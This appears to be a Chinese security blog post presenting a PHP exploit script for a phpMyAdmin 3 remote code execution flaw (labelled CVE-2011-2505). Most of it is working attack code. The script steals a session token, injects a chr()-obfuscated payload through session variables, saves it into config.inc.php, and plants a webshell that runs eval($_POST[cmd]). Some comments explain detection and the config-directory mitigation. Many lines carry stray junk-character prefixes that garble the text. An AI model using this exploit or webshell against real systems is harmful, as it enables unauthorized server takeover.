最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp,由于我搞得晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
/ D @" K4 m3 Z0 M" r+ }#!/usr/bin/php
6 M% A4 w ]5 Y& x* ]9 C<?php
// Proof-of-concept driver for the phpMyAdmin 3 issue the banner below labels
// CVE-2011-2505. Precondition (stated in the comment block after the banner and
// repeated by the final failure message): the application's config/ directory
// exists and is writable by the web server -- a deployed instance should never
// be in that state, which is also the mitigation.
// Flow: argument check -> probe config/ -> scrape session id and token from
// index.php -> one GET that places attacker-chosen text into $_SESSION ->
// POST to setup/config.php with submit_save -> fetch config/config.inc.php to confirm.
// Detection: the requests this script sends carry `session_to_unset` together
// with `_SESSION[ConfigFile]` in a query string, followed by a POST to
// setup/config.php containing submit_save=Save, all with a fixed MSIE 6 User-Agent
// (see php_request below).
8 S" p; e! s/ }1 s \4 b+ oprint_r('
. E4 l( Q6 F D1 L1 `6 [. _3 y+---------------------------------------------------------------------------+- A/ q& M$ @* a# g
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
% j, C) Q- r _+ H" R% g3 d. K& }/ q' Fby oldjun(www.oldjun.com)
- [1 ?: s" C0 Q9 L! Y9 G1 y/ ^welcome to www.t00ls.net. e- P! Y( E- Y
mail: oldjun@gmail.com
, t4 l0 H M+ [Assigned CVE id: CVE-2011-2505/ \( k7 }( Z+ [# y
+---------------------------------------------------------------------------+; e# m: a9 W% _2 G/ h
');; [6 g! U5 Y: a- {
9 P/ W+ d# H l5 }* z
/**
9 _- [( }: ~* @# N. t * working when the directory:"config" exists and is writeable.
`. @2 }+ t% M; b ]. E**/
' t: Y' _$ o6 W+ x' r, h5 L: d0 \ 0 Q7 M' Z( Y/ ^1 m; D0 O
// Usage banner and exit when host/path are not both supplied on the command line.
if ($argc < 3) {
& d4 P% J. `. x( A print_r(' ?7 J# B* [3 a- U
+---------------------------------------------------------------------------+
; f9 T6 H% |% k6 s: xUsage: php '.$argv[0].' host path8 E& v* q. {% s$ b" X- R7 u
host: target server (ip/hostname)* I$ m: w9 X( H- ^# |( P# C1 Y$ C
path: path to pma3$ Y* m, L7 j' l" y) _
Example:
6 B$ N1 x3 X" I/ |# k* M* lphp '.$argv[0].' localhost /pma/( k4 M0 O7 h* G, ?. c( y Q
+---------------------------------------------------------------------------+
/ A# S: C5 I, Y( u* b0 w Y+ m');: s8 Q( |, r4 [7 f/ Y) ]( l+ y/ Y
exit;. V f# G& d' W3 o0 I2 g
}
8 v$ R* c( A! N
// $host and $path are script-level globals; php_request() reads them via `global`.
# P' U" e; F& [8 ?' U$host = $argv[1];
0 q: g$ e+ j ?$path = $argv[2];) P$ r/ m6 q$ V
7 S3 p' B: Y& h ~- i: I4 [/**9 Y; N! r: ^" K7 x
* Try to determine if the directory:"config" exists
7 o% W8 y* a: A& w1 K**/. |1 I- G/ V; n8 {/ D h
echo "[+] Try to determine if the directory:config exists....\n";
// Presence probe: a '404' substring anywhere in the raw response (status line,
// headers or body) is taken to mean the directory is missing.
5 a3 |) \4 t# `) d$returnstr=php_request('config/');
5 p+ L+ ?4 Y4 G) [6 W7 jif(strpos($returnstr,'404')){+ @9 ^* A; x q
exit("[-] Exploit Failed! The directory:config do not exists!\n");
u, Y/ Y! q \, V8 U- c t- c4 h}
% `- k ~' Y ^6 J( g. p; p
7 f% @6 X+ C; |% ?9 q+ ~ `0 \/**
$ }& I* K$ s+ `7 V4 G. k * Try to get token and sessionid/ q$ e/ U8 h1 ?0 t& W+ [
**/8 G/ h0 @' S/ a! `& o+ `
echo "[+] Try to get token and sessionid....\n";# n- L# F( E( {0 ]! C. C0 S
// The phpMyAdmin session cookie (32-40 word characters) and the CSRF token
// (32 word characters) are scraped from the index.php response with the regex
// on the next line; both must be non-empty for the script to continue.
$result=php_request('index.php');
+ D. Z5 |9 s1 N: k9 W5 Bpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
5 Y* T( g$ l. T0 W+ d4 A6 c* H$token=$resp[3];
, o# ?: h8 x) j8 @& k- L$sessionid=$resp[1];
+ b! o' \2 P* pif($token && $sessionid){" f' w* k* F! e. W0 k6 \ h
echo "[+] token token\n";
l! c/ B# H" o echo "[+] Session ID sessionid\n";
" d& c/ H* R, p. C5 r' Q, f" [}else{, K8 j9 C9 @* M& T
exit("[-] Can't get token and Session ID,Exploit Failed!\n");# q; k- q# V. i5 \
}
9 [ E" K6 S4 m6 {
# S. c" N9 Q2 L7 l" y6 a3 e0 P: \0 o t/**
c; A s( {" P1 \! I% f * Try to insert shell into session, B) @/ ?* P Q
**/
7 p. |/ J2 v9 jecho "[+] Try to insert shell into session....\n";7 X8 b9 y t) H2 F; |! u% k& K! p
// One GET, authenticated with the scraped cookie and token, whose
// _SESSION[ConfigFile][Servers][...][host] key text contains PHP code.
// Presumably the save step below writes that key text into
// config/config.inc.php without escaping -- the vulnerable server code is not
// on this page, so this is inferred from the verification step at the end.
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
" A/ X4 {& { R1 D, ^3 @
, Q r9 y* \) b8 ^! S4 ^/**
8 B# b0 T* l, [% y * Try to create webshell
% A# S4 P: M, J$ w; U7 b; s; F**/
8 e# l; c: A4 F' U vecho "[+] Try to create webshell....\n";
// Triggers the setup page's "Save" action with the same session cookie and token.
3 h6 b! Z K0 P9 ?- ]0 p! V: c: V) G: Hphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 Y& D7 n& b( k$ p9 G" D% B/**+ Y5 S) z# e8 G, l; w% D+ n5 k7 B
* Try to check if the webshell was created successfully
. J( `6 P O1 |. Q9 R**/. _3 N2 k) P N, Z) s; I
echo "[+] Try to check if the webshell was created successfully....\n";
// Verification: fetching config/config.inc.php and finding the marker 't00ls'
// (the string the injected code echoes) is treated as proof that it executed;
// the success message then names the file it wrote under config/.
& a( H" |& i% o( j3 b/ z$ }$content=php_request('config/config.inc.php');( J& u8 ~) ]8 p3 Z, e7 o
if(strpos($content,'t00ls')){
- R1 ~% }9 P, k' Q7 P echo "[+] Congratulations! Expoilt successfully....\n";, F/ G. N8 V4 J2 d, L
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
* M: Q& ]/ i( O* U3 ]! f}else{4 ^% u6 a& \: t0 u( N7 N o" v
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
4 c# F3 g6 t5 }5 @! b% M}/ C" u9 Y( |9 i+ H D
) A ]* O% H1 H0 b/ A3 z0 B
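/**
 * Sends one raw HTTP/1.1 request over a plain TCP socket and returns the whole
 * response (status line, headers and body) as a string.
 *
 * The target comes from the script-level globals $host and $path, as in the
 * rest of this script; $url is appended to $path unchanged. The method is GET
 * when $data is empty and POST otherwise, with the body sent as
 * application/x-www-form-urlencoded. A non-empty $cookie is sent verbatim as
 * the Cookie header. "Connection: Close" is requested so that the server
 * closing the socket ends the read loop.
 *
 * The fixed MSIE 6 User-Agent below is a stable fingerprint of this tool's
 * traffic in web-server logs.
 *
 * @param string $url    request path relative to $path
 * @param string $data   url-encoded POST body, or '' for a GET
 * @param string $cookie raw Cookie header value, or '' for none
 * @return string raw HTTP response; the script exits if no connection can be made
 */
function php_request($url, $data = '', $cookie = '')
{
    global $host, $path;

    // Compare against '' instead of relying on truthiness so a body of "0" is still POSTed.
    $hasBody = $data !== '';
    $method = $hasBody ? 'POST' : 'GET';

    $packet = $method . ' ' . $path . $url . " HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    if ($hasBody) {
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= 'Content-Length: ' . strlen($data) . "\r\n";
    }
    if ($cookie !== '') {
        $packet .= "Cookie: $cookie\r\n";
    }
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data;

    // gethostbyname() pins the connection to IPv4 as the original did; on a
    // lookup failure it returns the name unchanged and fsockopen() reports the error.
    $errno = 0;
    $errstr = '';
    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr, 10);
    if ($fp === false) {
        // Same exit-on-failure behaviour as before, now with the socket error and a newline.
        exit('No response from ' . $host . ": $errstr ($errno)\n");
    }

    fwrite($fp, $packet);

    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === false) {
            break; // read error: return what was received so far
        }
        $resp .= $chunk;
    }
    fclose($fp); // the original left the socket open until script end

    return $resp;
}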
8 }0 c/ n6 b; S/ v4 k' C- U?> ; K/ g* Q! g+ ]; Q
. |